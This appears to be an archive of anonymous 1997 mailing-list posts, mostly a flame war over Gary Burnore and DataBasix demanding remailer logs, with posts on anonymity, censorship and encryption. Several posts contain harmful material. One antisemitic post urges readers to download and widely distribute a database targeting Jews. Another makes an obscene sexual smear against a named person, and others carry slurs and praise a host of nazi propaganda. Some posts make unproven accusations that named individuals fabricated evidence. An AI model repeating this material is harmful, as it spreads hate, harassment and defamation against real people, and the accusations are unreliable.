"anon-asshole" was a lie?  Or your accusation that Scott Dentice was this
person?  Remember, it's YOUR theory that there's only ONE such person, yet you've
accused three different people of being this individual.
If you don't like my answer, then stop asking the question.  As one of the
former users of Jeff Burchell's now-defunct remailer, please explain why
you wanted him to turn over his logs to you and Belinda Bryan which, had they
existed, would have listed the identities of everyone who either sent or
received anonymous mail through that remailer.
They're YOUR claims, Gary. You're the one who keeps claiming that you're the
victim of "forgery", "libel", "spam baiting", etc.  You are the one that made
the unsubstantiated claim that a remailer user sent a harassing letter to an
unnamed "teenage girl" with a web page at DataBasix. You are the one who needs to prove them.
I'm posting anonymously?  Well cry me a river.  Deal with it!  If that's your
charge, then it says more about you than it does about me.  If posting anonymously
upsets you, then that alone is reason enough to do it.
I'm lying about you?  How?  By asking you why you wanted to violate the
privacy of all of the users of Jeff Burchell's remailer?  It was Jeff's
post that revealed your attempt to violate the privacy of his users.  I only
referred to it.  How does that make me a liar?
Then why did you harass Jeff Burchell by demanding that he turn over his logs
to you that would have identified all of his remailer's users and effectively
shut it down by destroying confidence in its integrity.  Did you really think
that the remailer would have remained viable after it was revealed that its
operator turned over its logs to DataBasix or the Church of Scientology?  Or
were you hoping that your attempted end run on privacy would remain your own
dirty little secret?
How so?  You claim that you don't use remailers.
Your disinformation is getting old.  You've posted no evidence:    * No evidence that this so called "harassment" even occurred.    * No evidence that it originated from someone other than a DataBasix staffer
    fabricating evidence for a smear campaign.
  * No evidence that I did it.
  * No evidence, period.
Typical DataBasix big lie technique.  How about the evidence, BurnFUD?
HINT: Unsupported allegations that an UNNAMED user at DataBasix was "harassed"
by an UNDISCLOSED e-mail from an UNNAMED person using an UNNAMED remailer are not evidence.
I've posted a URL to my evidence, posted by a NON-anonymous, firsthand witness
to your abuse, that NAMED you, Belinda Bryan, and William J. McClatchie.  You are invited to do likewise, if you have any such evidence.

@_date: 1997-12-13 01:49:49
@_author: Anonymous 
@_subject: No Subject 
Choosing to not become a member of the collective society/mindset the government
has put in place will soon become illegal.  Money laundering is illegal for a
very simple reason everything is becoming illegal: Control.  Money laundering prevents
the government to "control" your money.  When they could not take your money in the
interest of national/public/child safety for such wasteful ventures like the perpetual
war on drugs ,and when you thought for yourself and realized how wasteful it all was and that you would not willing give your money the government made it illegal to hide
your money.  Then they came up with asset forfeiture laws to legally take your vaporware,
commonly referred to as 'money'.

@_date: 1997-12-13 03:38:33
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
^^^^^^^^^^^^
Good idea.  Notice Gary's usage of ad hominem argumention to avoid the issues on the faulty premise that if you hate the messenger then you can safely ignore the message.  To Gary Burnore, his constant use of the perjorative "anonymous asshole" is apparently intended in the same manner as "heretic" was in the
Middle Ages or "witch" was in 17th century New England.
The original premise was that since the Mailmasher pseudonym server was
allegedly allowing forgeries, it should be shut down.  McClatchie's problem
was that he mistook Mailmasher for a remailer and sought to prove that it allowed forgeries through the pasting of From: headers when, in fact, Mailmasher never had this capability.  (Some of the remailers formerly did, but that was corrected long before the June incident with Gary Burnore, Belinda Bryan, and Jeff Burchell.)  The "evidence" that was posted back then in an attempt to implicate Mailmasher in forgery consisted of usenet posts with
truncated Path headers which stopped at the mail-to-news gateway from which
they were posted.  And none of the messages was more recent than 2/97.
Mailmasher was a predecessor to Hotmail and the other web-based e-mail providers.  The difference was that Mailmasher didn't require you to identify yourself to establish an account, but you could choose a pseudonym
and use that instead.  It never had any capabilities to specify a From:
address.  This the forged messages apparently not only had forged "From:"
lines, but a forged "Message-ID:" as well, to make it look as if it came
from Mailmasher.  The forger, however, apparently chose the wrong site to
If you'll reread Jeff's post (the one in the URL that I previously posted),  you'll get a little insight into Gary's actions and apparent motives for his later attacks on Jeff's other server, the Huge Cajones Remailer.  Let me
quote a short excerpt:
-> I still don't know what the hell is going on with DataBasix, Wells Fargo
-> and Gary Burnore, but I suspect that someone used huge.cajones to say
-> something extremely unflattering about Burnore (from what I can tell, -> he had it coming).  Burnore then decided that he would make things
-> difficult for me.  First, he wanted the user who had posted something
-> "inflammatory" about him revealed.  When I told him that I couldn't  -> do that, he carried on about mail logs and identifying the host that
-> a message came from (the usual).  I didn't explain to him that my
-> machine keeps logs, but not anything involving a *
-> address.  He then requested the logs, which I denied (and told him
-> to get his lawyer to send a request...)
The issue was an "unflattering post", not any sort of forgery or other abuse.
The so-called "spam bait" only "conveniently" appeared later when DataBasix was in need of more ammo to use to get the remailer shut down:
-> Between the time he first contacted me, and the time I received the
-> letter from Belinda Bryan, is when the baiting of databasix addresses
-> began (slowly, with just a few posts).
Now how would a third party, who was not privy to Gary and Belinda's
private dealings with Jeff be able to exploit that timing by initiating
the spam baiting at just the "right" time?  It was almost as if the abuse appeared right on cue, just in time to bolster the case of DataBasix vs. Huge And notice that from Jeff's chronology, the demand by Gary Burnore and Belinda
Bryan for Jeff Burchell to turn over his logs to them came BEFORE this
alleged "spam baiting" and was based on the unflattering CONTENT of a post,
not on any alleged "forgery".  None of this can be called speculation.  It's a factual, historical account of DataBasix' dealings with Jeff Burchell.
Plain and simple, Gary's demand for Jeff's logs was a blatant attempt at
censorship through intimidation.  IOW, the clear implication was "if you
dare to criticize me, I'll hunt you down and you'll be sorry".
That's precisely my point.  And now he refuses to disclose his motives for
that demand or what he intended to do with the names and addresses contained in those logs.  Every time he's asked the question of why he attempted to
violate the privacy of hundreds or perhaps thousands of remailer users, it elicits another tantrum that goes, "Lies!  Prove it!  Why are you harassing me?  What are your demands?"
It's not relevant.  His usage of "anonymous asshole" is apparently generic
for anyone who dares to challenge him and who posts anonymously, and is an
obvious attempt to demonize all such individuals to divert attention from his
own tactics.
The whole "spam bait" issue is obviously a smoke screen, since the alleged spam-bait came AFTER the demand for Jeff's logs.

@_date: 1997-12-13 03:50:55
@_author: Anonymous 
@_subject: Whoever thinks the "word" is censored, post the 'word' fool 
I'm curious -- how would you know whether he's done so or not?  I don't recall you making that invitation to him.  Do you even accept incoming
e-mail from remailers?
Maybe it's time for Alex to join this thread and either say "no, we don't
filter on any words at the Replay remailer", or else "yes, here's a list
of the words we consider to be objectionable, so please omit them from
your posts through the Replay remailer".
I'm half expecting that his posts aren't showing up either because he's
screwed something up in the message to the remailer (like misspelling the
word "Newsgroups" in the header, for example), because the posting
gateway is flaky, or because some Net Nazi has taken it upon himself to
indiscriminately forge cancels to posts he doesn't like.  But some definitive word, one way or the other, would go a long way towards clarifying this
situation.  I see no rational reason for covertly blocking posts based on
content.  *IF* he didn't want something posted, then an announcement that
the Replay remailer rejects posts containing certain words or phrases
would make life simpler for all concerned.
And to whoever created the subject line for this message, I'm tempted to
either post the word "fool", or say that it's a lousy "Mr. T" impression. :)

@_date: 1997-12-13 22:11:36
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
That is exactly my objection to the tactics of Gary Burnore and the DataBasix
NOW Gary claims that he's not against remailers, yet his treatment of Jeff Burchell speaks for itself.  In the past, he's said things like "remailers
have their place, but their operators should prevent them from being used for abuse".  That sounds reasonable, until you read between the lines.  He calls
the kind of discussion that the three of us are engaging in "harassment", and
has even, upon occasion, accused posts critical of him of constituting
"libel".  Yet he offers no suggestion of how a remailer operator is supposed
to detect and prevent "libel".  He has offered no handy-dandy Perl script
which will act as a "truth filter" and detect the truth or falsity of a
particular post, since posting the truth about someone, as unflattering as
it may be, is not "libel".
Actually, Gary may unwittingly prove to be a "friend" of remailers, yet.  His
dealings with people who challenge him publicly should serve as an object
lesson as to why people may wish to think twice before broadcasting their
e-mail addresses to the world with every Usenet posts.  Most people, I would
suspect, would not consider it great fun to speak their mind and face
retaliation by having an old state tax lien (complete with street address)
dredged from the archives and posted worldwide to usenet, with the threat that
unless the criticism ceases, "there's more where that came from".
It's sort of hard to harass an anonymous poster in that fashion, so Gary has
to settle for juvenile taunts of "anon asshole".

@_date: 1997-12-13 22:42:39
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
I'm not sure how you're involved in this scenario, nor what your source of
information is.  I was quoting from a public post by Jeff Burchell, the operator of the remailer in question, and he specifically stated that the so-called "spam baits" began AFTER Gary Burnore had demanded that Jeff turn over his remailer logs to DataBasix, and BEFORE Belinda Bryan sent him the letter claiming to be with DataBasix' "legal department" and formalizing that demand.
Read it for yourself:
-> I still don't know what the hell is going on with DataBasix, Wells Fargo
-> and Gary Burnore, but I suspect that someone used huge.cajones to say
-> something extremely unflattering about Burnore (from what I can tell,
-> he had it coming).  Burnore then decided that he would make things
-> difficult for me.  First, he wanted the user who had posted something -> "inflammatory" about him revealed.  When I told him that I couldn't
-> do that, he carried on about mail logs and identifying the host that
-> a message came from (the usual).  I didn't explain to him that my
-> machine keeps logs, but not anything involving a *
-> address.  He then requested the logs, which I denied (and told him -> to get his lawyer to send a request...)
Here comes the key part:
-> Between the time he first contacted me, and the time I received the -> letter from Belinda Bryan, is when the baiting of databasix addresses
-> began (slowly, with just a few posts).
It appears that his account differs from yours.

@_date: 1997-12-14 06:15:37
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
I don't expect anybody to "believe me".  That's why I have posted a URL to a post by Jeff Burchell in which he outlines your tactics, such as your demand
that he turn over his logs to you, which would have had the effect of compromising the remailer's security and eroding confidence in it.  Is that
really what you wanted?  For remailer users to distrust the remailer net and
stop using it?  You have still not explained why you wanted the remailer logs and what you intended to do with the names and addresses contained therein.
Would you care to prove that?  Saying something that Gary Burnore or Belinda
Bryan don't like is not "libel".  To be "libel" a statement must be both
DEFAMATORY as well as FALSE.  While being reminded of your own actions
several months ago might prove to be embarassing, it's not libel.
What was really laughable was when your fellow DataBasix staff member Billy
McClatchie accused another anonymous usenet poster of "slander"!  He must have gone to the same law school as Belinda. That's not what Jeff's post said.  It said that your pretext for demanding his
user logs was an "unflattering post", not all this nonsense about "spam baiting"
that you invented later.
My "harassment"?  You keep whining about my so-called "harassment", but you
have yet to prove ANY of it.
What would people have to be smoking (and inhaling) to believe that nonsense?
Anyone who demands that a remailer operator violate the privacy of all of his
users to placate one chronic whiner is no "friend" to remailers.  Such "friends" they can do without.  What do you think it would have done for the reputation of remailer security if Jeff had actually kept logs and had turned them over to individuals such as you and Belinda?
Do you really think it would be more "pro remailer" to just pretend that your
attempt to attempt to obtain sendmail logs from the Huge Cajones Remailer didn't occur?
Of the two of us, I'm the one that admits to actually USING remailers.  For me
to try to shut them down would make no sense.
If you don't like being called anti-privacy, stop being anti-privacy.

@_date: 1997-12-14 08:28:30
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
That has got to be one of your most asinine assertions in awhile!  Maybe at
DataBasix logs are a recognized substitute for intelligence, but apparently
it is not universally so.  Had any of the abuse you allege been occuring at
Jeff's remailer, I'm quite sure that anyone "abused" would have complained to
You're still beating around the bush.  You claimed that it was this so-called
"spam baiting" that you were trying to stop, but Jeff has pointed out that
you demanded a copy of his logs BEFORE any of it came through his
remailer.  According to him, you demanded that he turn over his logs and thus
violate his users' privacy because of a single "unflattering post" for which
you were trying to hunt down the author.  So what did you intend to do with
all those names and addresses?  If the Church of Scientology didn't succeed
in their attack on the privacy of Jeff's remailer users, what made you think
that DataBasix would succeed?  Belinda Bryan's legal skills being "superior"
to those of Scientology lawyer Helena Kobrin, perhaps?
And as far as this "spam bait" that you keep whining about coming from other
sources, you aren't going to repeat your old accusations that it was "forged"
from Mailmasher, are you?  The person who fabricated that "evidence" shot
himself in the foot and tried to frame the wrong target.  Mailmasher wasn't
even a remailer and had no header pasting capability.  Mailmasher's attacker
(none other than DataBasix' own Billy McClatchie) should have done his homework first.

@_date: 1997-12-14 08:44:05
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
"Obvious" because I'm the one using a remailer as a communications medium.  To
attempt to destroy my own means of communications would be ludicrous.  Gary,
on the other hand, has stated that he does NOT use remailers.  He would thus
have nothing to lose if any/all of them were closed down.  It would be
similarly ludicrous (though perhaps less so) to accuse Gary of annoying,
flaming, and accusing people as part of a scheme to get Netcom shut down.
Interestingly enough, Belinda Bryan, out of the blue, recently taunted a poster to  netcom.general by saying, "Are you going to use anonymous remailers to attack Gary next?".  It's almost as if the crew at DataBasix is INVITING "abuse" via remailers,  and it has had an uncanny knack for appearing right on cue from them in the past, too. (Just like the so-called "spam bait" started showing up right after Gary's initial demand to Jeff that he turn over his logs to DataBasix.)
Nor does it make sense that if I wanted to get remailers shut down, I'd limit
myself to criticizing one little obnoxious clique on usenet, namely the DataBasix Gang.  I doubt that anyone is likely to arouse a hue and cry against remailers from the masses by criticizing Gary, Belinda Bryan, and Billy McClatchie ("Wotan") anonymously.
Back when the alleged "spam baiting" was going on, Gary and Belinda were
accusing "rfg" of doing it.  For awhile, they accused Scott Dentice. Now
they've gotten tired of accusing named individuals and have invented a
mythical "anon asshole" who is supposedly responsible for just about
everything imaginable.  (I'm supposedly the latest re-incarnation of this
evil, mean ogre.)  Since Gary is adamant about there being one and only
one "anon asshole" responsible for all of this, at least one of his
accusations against people he's named in the past must have been a lie.

@_date: 1997-12-15 07:13:33
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
I suppose you have that on the "authority" of your unnamed "unimpeachable
source", huh?  (The same one who you claimed knows more about what was going
on with Jeff Burchell's remailer than Jeff himself did.)
Shades of McCarthyism....  When Gary Burnore and the DataBasix gang become
the standard for "credibility", the word will have become meaningless.
Strangely enough, a search of the public database of listed telephone numbers
turns up nothing for you.  If you'd like to post your home address and telephone number, in the name of Gary Burnore's "tell all if you have nothing to hide" philosophy, be my guest.
For the same reason you'd no longer be able to post from mailexcite.com if someone decided to shut it down!  I guess I've overestimated the intelligence of Gary Burnore's tag team if
the answer to your question wasn't obvious. Now would you care to tell us why the wonderful folks at DataBasix thought they were entitled to copies Jeff Burchell's sendmail logs listing both the
senders and recipients of anonymous mail through Jeff's remailer and what they planned to do with the information in them?  (If you don't know, perhaps you can ask your "source" who seems to know everything about this whole episode.)

@_date: 1997-12-15 11:47:49
@_author: Anonymous 
@_subject: Invitation to Join "Nym" 
You are cordially invited to join "Nym," a new mailing list devoted to
discussing anonymity and pseudonymity.
The topics: anonymity's history, current politics, and proposals to
regulate anonymous speech and commerce.
Nym's primary, but not exclusive, focus is on anonymity and pseudonymity
online. This includes the technologies of untraceability: digital cash,
anonymous remailers, and public key encryption.
It will be unmoderated but not widely advertised at first in hopes of
preserving quality of conversations. Personally, I'd like to see folks
join from many disciplines. I don't expect it to be very high volume.
To sign up, or for more info:
  Or send "subscribe nym" to majordomo at vorlon.mit.edu.

@_date: 1997-12-15 23:37:30
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
rashidk at mailexcite.com (Rashid Kaman)
Sorry, I forgot you were from DataBasix, where most words are four letters in
length.  (Hint: I wasn't talking about CHARLIE McCarthy...)
Of course I respect privacy.  Your phone number would only have been there if you'd CHOSEN to have it listed by the phone company, right?  And if you'd
chosen to have it listed, then it would be logical to assume that you WANTED
people to have it.  It's not like I went to your phone company and demanded that they turn over a listing of their unlisted numbers.  (Your buddy Burnore, OTOH, did demand a list of all the users of the Huge Cajones Remailer from their logs.  In case you're unclear on the concept, people use remailers so
that people like Gary and Belinda WON'T have access to their e-mail addresses.)  It was Gary Burnore and Belinda Bryan who've been denouncing "hiding behind" anything, so I found it sort of ironic that all of them have unlisted phone numbers while whining about my unlisted e-mail address.  (Should I adopt Burnore's tactics and start calling the denizens of DataBasix "Unlisted Assholes"?  Nah!)
"Cope out"?  Sorry, I don't have a DataBasix-speak dictionary, and am not
familiar with your in-house (or outhouse) jargon.
Regardless of whether it is a "cope out" or not, it is an answer.  Sorry if you
don't approve.  If the remailer I use for posting were to shut down, I
obviously would no longer be able to utilize that resource, just as you'd no
longer be able to use mailexcite.com if that were to be shut down.  Something
about that too difficult for you to understand?  You might feel differently if
Billy "Wotan" McClatchie had gone after Mailexcite rather than Mailmasher.

@_date: 1997-12-16 01:31:08
@_author: Anonymous 
@_subject: No Subject 
Check the archives.  There was plenty of discussion when it happened.
I'm convinced they used names pulled out of Bell's computer, not a
cypherpunks subscriber list as they sent my copy of the SPAM to an
email address that had long been retired at the time of the mailing,
but had been used to exchange email with Jim.  Far more active list
members than I didn't get a copy.
They did, and we were.  Here's a copy of one message I saved:
 ...
 ...
If those headers are forged, it is an expert forgery.
The MX hosts for the net.insp.irs.gov domain are fun:
net.insp.irs.gov        preference = 10, mail exchanger = tcs-gateway2.treas.gov
net.insp.irs.gov        preference = 20, mail exchanger = tcs-gateway1.treas.gov
net.insp.irs.gov        preference = 30, mail exchanger = gotcha.treas.gov
irs.gov nameserver = gotcha.treas.gov
irs.gov nameserver = nis.ans.net
irs.gov nameserver = ns.ans.net
tcs-gateway2.treas.gov  internet address = 204.151.246.2
tcs-gateway1.treas.gov  internet address = 204.151.245.2
gotcha.treas.gov        internet address = 204.151.246.80
`gotcha.treas.gov'?  It's a real host connected through ans.net ...
12  h10-1.t32-0.New-York.t3.ans.net (140.223.57.30)  139.839 ms  126.702 ms  125.82 ms
13  h11-1.t56-1.Washington-DC.t3.ans.net (140.223.57.21)  147.248 ms  124.774 ms  118.815 ms
14  f0-0.cnss60.Washington-DC.t3.ans.net (140.222.56.196)  192.54 ms  125.939 ms  166.529 ms
15  enss3080.t3.ans.net (192.103.66.18)  130.917 ms  131.057 ms  145.377 ms
16  gotcha.treas.gov (204.151.246.80)  133.065 ms  134.345 ms  131.596 ms
Except for hop 16, this is the same traceroute as to
tcs-gateway2.treas.gov.  For what it's worth, the traceroute to
tcs-gateway1 is slightly different:
 8  h13-1.t16-0.Los-Angeles.t3.ans.net (140.223.9.14)  44.997 ms  51.526 ms  51.875 ms
 9  h14-1.t112-0.Albuquerque.t3.ans.net (140.223.17.10)  60.895 ms  60.426 ms  57.762 ms
10  h14-1.t64-0.Houston.t3.ans.net (140.223.65.9)  81.131 ms *  85.067 ms
11  h14-1.t80-1.St-Louis.t3.ans.net (140.223.65.14)  117.62 ms  100.623 ms  104.878 ms
12  h10-1.t60-0.Reston.t3.ans.net (140.223.61.13)  126.368 ms  136.017 ms  123.367 ms
13  f2-0.c60-10.Reston.t3.ans.net (140.223.60.220)  129.505 ms  128.214 ms  128.52 ms
14  enss3079.t3.ans.net (204.148.66.66)  134.707 ms  162.912 ms  160.774 ms
15  tcs-gateway1.treas.gov (204.151.245.2)  154.268 ms *  155.898 ms

@_date: 1997-12-16 20:19:10
@_author: Anonymous 
@_subject: The Joys of Being Canadian 
Now the question is: When they find out you lied will they care?

@_date: 1997-12-17 06:48:22
@_author: Anonymous 
@_subject: No Subject 
The main french PGP HomePage is now here :
The page is called "PGP POUR LES FRANCAIS" ("PGP for the french people") and is wholly in french language.
You can find here a lot of informations about PGP 2.x and 5.x and a detailed PGP history.
A bientot :)
PGP pour les franais

@_date: 1997-12-17 16:06:07
@_author: Anonymous 
@_subject: "where would you find" 
Yes, friends, it's the demon site, straight from hell. It's that evil spirit
which has sexual intercourse with men in their sleep. It even steals
resources from thousands of others in the community! You too can pay for
pictures of nude demons to look at while you're asleep!

@_date: 1997-12-17 18:58:54
@_author: Anonymous 
@_subject: OTP 
Tim C[ocksucker] May's abysmal grammar, atrocious spelling and feeble responses clearly identify him as a product of the American education system.
          0
        //\/ Tim C[ocksucker] May
       \/\
     ... /

@_date: 1997-12-18 02:51:14
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
Or why, if Rashid's explanation of the alleged "spam baiter's" access to the
list of account-holders at DataBasix is to be believed, *ALL* accounts at
DataBasix would be published on a publicly-accessible web page.  (Why worry about a spammer getting them from a usenet post when they're just sitting on the web, ripe for harvesting?  If the alleged "spam baiter" supposedly found
them there, then the UCE address harvesters could have done the same.)  Thus,
even if Gary's unsubstantiated claims of an increase in UCE at DataBasix are
true,  it could as easily be attributable to Gary's "spam baiting" of those
addresses himself on a public web page as to a hypothetical SECONDARY "spam baiter" reposting that same information to usenet.
Had there been an outside "spam baiter" snarfing addresses from one of
DataBasix' own web pages, and Rashid knew which page was the source of this
information leak, I'm curious why Gary didn't check his httpd logs and find
out who the culprit was.  Assuming the alleged spam baiting was the work of
an outside attacker, then Gary's own logs would have proven more useful than
Jeff Burchell's remailer logs.  Since the page doesn't show up in any of the
search engines I know about, it would likely have had a very low hit count,
and probably all from a single suspect.  OTOH, if Rashid Kaman is not
telling the truth about this mystery web page, then Gary's logs would have
yielded nothing and there would be no plausible way to explain how an outside
attacker supposedly obtained the addresses in the first place.
I also notice that Rashid Kaman was the one who publicly accused rfg of
harassing an unnamed "teenage girl" who had a web page on the DataBasix site.
Did this mysterious spam bait web page at DataBasix also include the AGE of
each employee and customer?  Was this mystery "teenage girl" an employee or
a customer of DataBasix?  How did Rashid find out about her alleged
It gets curioser and curioser...
Other than one of the "spam baits" showing up with Gary Burnore's .sig still
attached to the post, and that message being posted when the finger daemon
at databasix.com showed Gary Burnore being remotely logged into databasix.com
from his work account at about the same time the post was
made, this is the most direct evidence of phony "evidence" being fabricated
at DataBasix itself intended to implicate a remailer in alleged "abuse".
No one has ever accused Gary Burnore of being particular clever or meticulous
in fabricating evidence.
If Rashid doesn't know, perhaps he can consult his unnamed "unimpeachable
source" who seems to know everything about the antics of DataBasix.

@_date: 1997-12-20 14:27:14
@_author: Anonymous 
@_subject: Hate speech and censorship 
I can warmly recommend Cyberpass.
Cyberpass does not censor political
speech. They provide anonymous accounts to a considerable low price. The
connection is telnet with a UNIX shell and SSH support. Cyberpass is a
division of Infonex InterNet Services. They have a policy "Go and get a court
order" which is very unusual. They already host  the OSTARA domain
 containing stupid nazi propaganda.
Others I could mention are
Concentric Network Corporation and Panix - Public Network Corporation and
  I am sure there are others who do not censor.
But these are those I trust most.
Most ISPs are more concerned about pornography than
hate speech.

@_date: 1997-12-20 14:33:33
@_author: Anonymous 
@_subject: No Subject 
This reason has zero credibility. If you want to add
something to the public record, then use your real name,
you ninny! Nobody will pay attention to (much less
belive) an anonymous message - no credibility!
Why do you think the Nym list was formed? So they
wouldn't have to put up with anonymous traffic, that's why. A new one-of-a-kind web site has been
put up that lets you see if you are one of the elite
sheeple who are TIME- and LIFE-approved for partaking
in public discourse:

@_date: 1997-12-21 04:56:03
@_author: Anonymous 
@_subject: Hate speech and censorship 
I wish you could be a little more specific.
Harrashing email and excessive cross-posting in violation of each UseNet group charter is not
If someone sends a gay an email saying "I will kill you. Look out for the next gay pride parade" that's is legitimate ground for action.
What is wrong selling privacy for money?
Do you have any prof that Lance Cottrell would "bending over" his principles in favour of money.
I suppose you can back up your claim with documentation.
What court document are you referring as evidence that Sameer Parekh is a pathological liar?

@_date: 1997-12-21 06:44:15
@_author: Anonymous 
@_subject: ECB, CBC, CFB, OFB 
Can somebody more experienced than I am explain the strengths and weaknesses
of these encryption modes as applied to CAST, IDEA, DES, and Blowfish?

@_date: 1997-12-22 21:14:15
@_author: Anonymous 
@_subject: What is Gary L. Burnore Afraid Of? (was: Anon asshole still has no proof) 
gburnore at netcom.com (Gary L. Burnore) ranted:
You just provided it in the form of the Subject: line that YOU chose for
this post -- "Anon asshole still has no proof".
Careful, Gary, your bigotry and paranoia are showing.  My "accusation" has
merely been at *ASK* you and Belinda Bryan why you demanded that Jeff Burchell
turn over the user logs from his Huge Cajones Remailer over to DataBasix and
what you intended to do with them after you obtained them.  It seems to be
you that's hiding the "true reason"
 for your own actions.
What "proof" does one need to ask a question or two?  Why do you resort to posting silly rants like this just to avoid answering those two questions?
You are the one making the ridiculous accusations without proof, that a
mythical "AnonAsshole " has supposedly done all matter of evil mischief
towards you.  And you conveniently try to discredit anyone who dares to criticize you anonymously of being this evil, mean ogre that you've invented.

@_date: 1997-12-23 01:11:44
@_author: Anonymous 
@_subject: Hate speech and censorship 
On behalf of the non-racist cypherpunks, please accept an apology for
Paul Bradley's racist message:
This does not reflect the mainstream view on the list.  Cypherpunks
understand that disparaging the racial background of others is a weak
and invalid form of argument.
While it may be appropriate to criticize actions taken during the list
moderation experiment, casting the issue in racial terms only reveals
the ignorance and bigotry of the writer.

@_date: 1997-12-23 05:06:22
@_author: Anonymous 
@_subject: Hate speech and censorship 
How ironic that Vulis supports the right of private libraries to refuse
service to bad-smelling readers, while whining about Gilmore's refusal
to allow Gilmore's own private machine to pass Vulis' foul-smelling posts.
Private actions are not censorship, and Gilmore had the right to do
anything he wanted with toad.com.  Likewise list members had every right
to move to other hosts.
Vulis's infantile name-calling is easily seen to be totally lacking in
justification, unsurprising given his demonstrated lack of reasoning
abilities on this issue.

@_date: 1997-12-23 07:48:45
@_author: Anonymous 
@_subject: Rich Graves and fight-censorship 
Can someone tell me why Rich Graves was kicked of fight-censorship some time ago?
Maybe Rich Graves himself will answer.

@_date: 1997-12-23 08:17:08
@_author: Anonymous 
@_subject: The Jewish Defense League doesn't want you to know! 
Recently The Jewish Defense League succeded in shutting the domain ABBC.COM
hosting a database of publicly available information of Jews who endorse The ISP CLEVER.NET forced Ahmed Ramito take off the list without any justifiable reason such as invasion of privacy.
Under U. S. law public figures must demonstrate actual malice to recover for invasion of privacy and for defamation.
But the information is publicly available and not covered by privacy laws in the United States.
If you want to review what the extremist Jewish organization JDL doesn't want
you to know go to Use the following search profile:
  ~a nobody at replay.com & Ahmed Rami Download it now and distribute it widely.
Remember to download all the article segments!
Be aware that The Jewish Defense League was founded by terrorist Meir Kahane whose Kach Movement
was labeled a terrorist organization by the U. S. State Department.
Related References:

@_date: 1997-12-23 12:42:42
@_author: Anonymous 
@_subject: Hate speech and censorship 
Yes, Sameer Parekh does keep a Bactrian camel in his C2Net office.
The camel is male.
Sameer uses his oral and anal orifices to play the part of a female camel.
 +-----
  O #   |
  | |
._ \ |
 +-
 Stop AIDS!

@_date: 1997-12-24 01:49:53
@_author: Anonymous 
@_subject: SPECIAL REPORT: Censorware in the StacksRe: SPECIAL REPORT: Censorware in the Stacks 
And the difference between `selecting' which books to acquire for the library and `selecting' which web pages to receive is what?
Those pages `not selected' by the Internet filter are not `reduced'
any more than the `not selected' books.  There is no consistent
application of principle in your arguments.
Then rub a couple of neurons together and see if you can generate
a spark.  If the government isn't in the business of either `selecting'
books or internet pages, then there is no `selecting' to be done in either case and therefore nothing to be solved.

@_date: 1997-12-24 03:39:52
@_author: Anonymous 
@_subject: Freedom Forum report on the State of the First Amendment 
[snip by me]
Oppression, in terms of private entities and citizens, is in the eye
of the beholder.  What you call oppression could just as easily be
interpreted as my right to free expression.  If I choose not to
associate with someone, for whatever reason, that's my right.  It's
just as much your right to not associate in any way with someone
who would treat you as such, and to deal only with people who will
not treat you that way.  That's how a free market and free society
It's oppression if I not only refuse to hire you, but also interfere
with you going about getting a job somewhere else.  But until I
actively try to keep you from persuing your own rights independent of
mine, I should have the perfect right to make my own decisions on
whether or not I associate with you.
I think there's a clearer case of oppression with regards to the
government's laws dictating who *HAS* to be hired.  That's an obvious
lessening of my right to discriminate as to whom I do and do not want
to deal with.  Where else in this society is this behavior mandated?
Do I have to sit in public with a racially diverse group of people?
Do I have to make it a point to talk to at least one Asian person
every day?  What's the difference?
That's ridiculous.  No one is sheltering themselves from the real world
here.  We're just questioning the dogma of these "real world experts."
Do you really think it's prudent to believe everything someone offers
up because they have an academic or "official" title behind their name?
Or a large portion of government to stand behind them?  I put more
faith in my own perception than anyone else's.

@_date: 1997-12-25 04:54:05
@_author: Anonymous 
@_subject: Cryptographers Do It With Protection 
Excerpts From:
None of Your Business: World Data Flows, Electronic Commerce, and the European Privacy Directive
Peter P. Swire & Robert E. Litan
  Data 'Control' is oppression.
  Data 'Protection' is our friend.
  "If putting all information about every individual on the face of the
globe in the hands of the New World Order saves the life of a single
  And these "data protection rules" are going to be enforced equally for
everybody, right?
  If you and I are fined and imprisoned for violation of these rules, then
it will be likewise for owners of megacorporations, government employees,
etc.   Just like at Waco and Ruby Ridge, Kent State and Tiennachinc Square...
Just like murdering dictators at the APEC summit would have been maced and
arrested if they carried signs saying "Freedom & Democracy."
  Get real. While Bernstein has the Dogs of InfoWar set on his ass, RSA
is exporting cutting edge encryption technology to Communist China.
Bottom Line: Just as is the case today, the "data protection" laws and
regulations of the future will apply only to those individuals and
corporations who fail to fall in line with the New World Order's desire
for all new technologies to contain tools of surveillance and oppression.
"Those who have nothing to hide, have nothing to fear."
  Put a cork in your asshole...the government is going to 'protect'
you again.
  -----------------------------------------------------------
  -----------------------------------------------------------
  ----------------------------------------------------------->|
                             6"

@_date: 1997-12-25 04:54:13
@_author: Anonymous 
@_subject: This post is none of your business 
Excerpts From:
None of Your Business: World Data Flows, Electronic Commerce, and the European Privacy Directive
Peter P. Swire & Robert E. Litan
  Keep in mind that ignorance of laws written on foreign shores, in foreign languages, will be no excuse.
  Americans can expect to be indicted as coconspirators of people they
have never met, have never seen, and have never communicated with.
  "Put down that copy of the Constitution, and slowly back away from
the keyboard, Monsieur!"
  So we can expect to see governments and megacorporations blow off
billions of dollars in order to protect Dimitri Vulis' privacy.
  Right...
  "None of Your Business" is full of references to "transnational"
corporations and organizations, and the development of "Intranet"
and "Extranet" webs within and among them.
  While it addresses many of the issues which will come into play
regarding regional laws and regulations in the expanding global InterNet (and does a damn fine job of it), I believe that, in the
end, the single issue which will decide the fate of all who use
the InterNet will be the right to privacy.
  Without privacy, freedom and self-determination are not possible.
  The more things globally change, the more they will remain the
same.   Individual Bernsteins will find themselves pitted against
the bottomless pockets of governments and corporations, while
'transnational' RSAs will be free to engage in activities of
momentous proportions which are forbidden to the Bernsteins of
the world in even the smallest of instances.
  'Data Protection' will be as big a farce as 'News Protection'
currently is. It will be a tool for those with money and power
to control and manipulate the information that citizens are
allowed to access, and the form in which they will be allowed
to view it.
  The 'personal information' concerning the 'guerilla' mothers
and babies who are slaughtered by US troops will be 'protected'
